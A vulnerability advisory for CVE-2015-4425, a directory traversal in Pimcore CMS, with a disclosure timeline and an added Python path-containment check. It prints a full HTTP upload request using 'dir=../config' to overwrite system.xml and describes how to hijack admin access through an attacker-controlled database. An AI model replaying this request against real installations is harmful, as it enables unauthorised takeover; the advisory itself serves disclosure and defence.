Vulnerability title: Directory Traversal/Configuration Update in Pimcore CMS

CVE: CVE-2015-4425
Vendor: Pimcore
Product: Pimcore CMS
Affected version: Build 3450
Fixed version: Build 3473
Reported by: Josh Foote


It is possible for an administrative user with the ‘assets’ permission to overwrite system configuration files by exploiting a directory traversal vulnerability.

The following request can be used to update the ‘system.xml’ file of the web application:

POST /admin/asset/add-asset-compatibility/?parentId=1&dir=../config HTTP/1.1
Connection: keep-alive
Content-Length: 1502
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: multipart/form-data; boundary=--------2072505619
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=nnmupv1knofcpdgjdnivdr4v27; cookie-warn=true; _ga=GA1.2.1941920115.1426505099; pimcore_admin_sid=j79b6ad4afkjimslbj8l5ifuo4

Content-Disposition: form-data; name="Filedata"; filename="system.xml" 
Content-Type: application/xml

<?xml version="1.0"?>
<zend-config xmlns:zf="">


This issue could allow an attacker to create or overwrite configuration files, or other files on the server, with malicious content in order to reduce the security posture of the application, or to lead to code execution, should an administrative account become compromised.

Due to the lack of path validation, any file which the web server user has access to could be overwritten, with the exception of PHP files. It was possible to update the application’s configuration file to use an attacker controlled database, after which an attacker could authenticate as an administrator using their own credentials. Once authenticated, the attacker could amend the configuration to use the original database again (the configuration file was publicly accessible and could be read before this attack was performed), thus gaining full access to the application and its data.
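As an added illustration (not Pimcore's own code), the following shows the kind of containment check that closes this class of bug: the client-supplied ‘dir’ parameter and multipart filename are resolved against the asset root and refused if the result leaves it. The request line is the one quoted above; the asset root path is a constructed placeholder.

```python
import os
from urllib.parse import urlsplit, parse_qs

# Constructed placeholder for the example; a real install has its own asset root.
ASSET_ROOT = "/var/www/pimcore/website/var/assets"


class UnsafePathError(ValueError):
    """Raised when a requested upload target would leave the asset root."""


def resolve_upload_target(asset_root, user_dir, filename):
    """Return the absolute path an upload may be written to, or raise.

    user_dir is the client-supplied 'dir' parameter, filename the multipart
    filename. The check is containment after normalisation, so '..' segments,
    absolute paths, NUL bytes and multi-component filenames are all refused.
    """
    root = os.path.realpath(asset_root)
    # The filename must be exactly one path component, without NUL bytes.
    if not filename or "\x00" in filename or os.path.basename(filename) != filename:
        raise UnsafePathError("bad filename: %r" % filename)
    if "\x00" in user_dir:
        raise UnsafePathError("NUL byte in dir")
    # os.path.join would discard root if user_dir were absolute, so treat a
    # leading slash as relative to the root rather than to the filesystem.
    candidate = os.path.realpath(os.path.join(root, user_dir.lstrip("/\\"), filename))
    # Containment: after resolving '..' and symlinks, the target must still sit
    # under root. '../config' normalises to a sibling directory and fails here.
    if os.path.commonpath([root, candidate]) != root:
        raise UnsafePathError("dir escapes asset root: %r" % user_dir)
    return candidate


def check_request_line(request_line, asset_root=ASSET_ROOT, filename="upload.bin"):
    """Parse the query string of an HTTP request line and validate its 'dir'.

    Returns (True, resolved_path) or (False, reason). parse_qs percent-decodes
    once, so '..%2Fconfig' is judged on the decoded value the app would use.
    """
    target = request_line.split(" ")[1]
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    user_dir = params.get("dir", [""])[0]
    try:
        return True, resolve_upload_target(asset_root, user_dir, filename)
    except UnsafePathError as exc:
        return False, str(exc)


if __name__ == "__main__":
    bad = "POST /admin/asset/add-asset-compatibility/?parentId=1&dir=../config HTTP/1.1"
    good = "POST /admin/asset/add-asset-compatibility/?parentId=1&dir=images/2015 HTTP/1.1"
    print(check_request_line(bad, filename="system.xml"))
    print(check_request_line(good, filename="system.xml"))
```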


Exploit code not required.


The vendor has released a patch.

Vendor status:

17/03/2015 Advisory created
17/04/2015 Vendor contacted
08/06/2015 Fix released
08/06/2015 CVE applied for
09/06/2015 CVE obtained
25/06/2015 Published

Copyright © Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.


The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.